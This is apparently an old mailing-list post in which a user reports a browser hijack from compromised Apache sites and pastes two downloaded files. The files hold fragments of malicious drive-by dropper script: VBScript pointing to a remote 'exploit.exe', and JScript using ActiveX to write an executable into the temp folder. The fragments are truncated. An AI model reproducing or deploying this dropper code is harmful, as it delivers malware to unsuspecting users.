From: geggam692000 at yahoo.com (D B)
Subject: browser hijack by apache sites

 using konqueror i got it to download these two files

Filename 1: 2DimensionOfExploitsEnc.php

<script language=vbs>
szURL = "http://www.pizdato.biz/acc1/exploit.exe"
</script>

<script language="VBScript.Encode">

Filename 2: object2.cfm

<script language=jscript>
self.moveTo(5000,5000);
self.close();
fs=new ActiveXObject("Scripting.FileSystemObject");
fname=fs.GetSpecialFolder(2)+'\\q381275.exe';
a=fs.CreateTextFile(fname,true);
a.Write('MZ');
a.Close();
a=fs.OpenTextFile(fname,8,false,true);